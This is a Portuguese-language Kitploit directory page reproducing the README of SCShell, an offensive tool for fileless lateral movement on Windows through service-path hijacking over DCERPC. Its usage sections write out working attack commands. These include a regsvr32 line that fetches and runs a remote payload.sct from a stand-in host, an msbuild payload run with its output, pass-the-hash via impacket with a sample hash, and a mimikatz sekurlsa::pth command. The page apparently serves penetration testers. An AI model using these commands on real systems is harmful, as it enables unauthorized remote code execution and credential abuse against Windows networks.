Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
SCShell — Ferramenta de movimento lateral sem arquivos que depende de ChangeServiceConfigA para executar comandos. | Kitploit
Ferramentas/GitHubGitHub/mr-un1k0d3r/scshell
ExploraçãoMovimento LateralTestes de PenetraçãoRed TeamingFerramenta de Acesso Remoto
GitHubmr-un1k0d3r/scshell

SCShell

Ferramenta de movimento lateral sem arquivos que depende de ChangeServiceConfigA para executar comandos.

Ver Repositório
1.7k2608há 3 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

SCShell

SCShell é uma ferramenta de movimento lateral sem arquivos que depende da ChangeServiceConfigA para executar comandos. A beleza desta ferramenta é que ela não realiza autenticação via SMB. Tudo é feito sobre DCERPC.

O utilitário pode ser usado remotamente SEM registrar um serviço ou criar um serviço. Também não precisa deixar nenhum arquivo no sistema remoto* (Depende da técnica usada para executar)

Como funciona

Em vez de criar um serviço, ele simplesmente abre remotamente um serviço e modifica o nome do caminho binário através da API ChangeServiceConfigA.

Em seguida, inicia o serviço.

Assim que a execução é concluída, o caminho binário do serviço é revertido para o original. O caminho do serviço original é extraído usando QueryServiceConfigA.

Tudo acontece sobre DCERPC, incluindo a autenticação.

network

Uso

A build atual está escrita em C, mas vou portá-la para C# e PowerShell.

root@kitploit:~
Usage:
SCShell.exe target service payload domain username password

target pode ser definido como local para executar o payload localmente

Execução remota

root@kitploit:~
SCShell.exe 192.168.197.131 XblAuthManager "C:\windows\system32\cmd.exe /c C:\windows\system32\regsvr32.exe /s /n /u /i://your.website/payload.sct scrobj.dll" . administrastor Password

Recomendo usar C:\windows\system32\cmd.exe /c para garantir que o payload não seja morto quando o serviço parar. Você PRECISA usar o caminho completo.

Você também pode usar um payload msbuild

root@kitploit:~
SCShell.exe 192.168.197.131 XblAuthManager "C:\windows\system32\cmd.exe /C C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\payload.csproj" . administrator Password
SCShell ***
Trying to connect to 192.168.197.131
Username was provided attempting to call LogonUserA
SC_HANDLE Manager 0x009ED250
Opening XblAuthManager
SC_HANDLE Service 0x009ED1B0
Service path was changed to C:\windows\system32\cmd.exe /C C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\payload.csproj
Service was started.

Estou usando o XblAuthManager como alvo, que é o Serviço de Gerenciamento de Acessórios Xbox

Passando o Hash

scshell.py é uma implementação em python2 e 3 do SCShell. Usando o projeto impacket, pode ser facilmente usado para realizar o mesmo movimento lateral usando pass the hash.

Instalação

root@kitploit:~
pip install impacket

Uso

root@kitploit:~
python scshell.py DOMAIN/USER@target -hashes 00000000000000000000000000000000:ad9827fcd039eadde017568170abdecce
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Command need to use FULL path. No command output.
SCShell>

Você pode usar o utilitário C para passar o hash. Por padrão, o token do processo atual será usado. Você pode definir o token do processo atual usando a abordagem padrão de pass the hash.

No sistema local

root@kitploit:~
sekurlsa::pth /user:user /domain:domain /ntlm:hash /run:cmd.exe

Em seguida, execute o SCShell.exe dentro do cmd.exe recém-criado.

Compilando a partir do código-fonte

O código foi compilado no Windows usando o compilador GCC Mingw

Crédito

Mr.Un1k0d3r RingZer0 Team

Tazz0 pelo apoio moral

Baixar ferramenta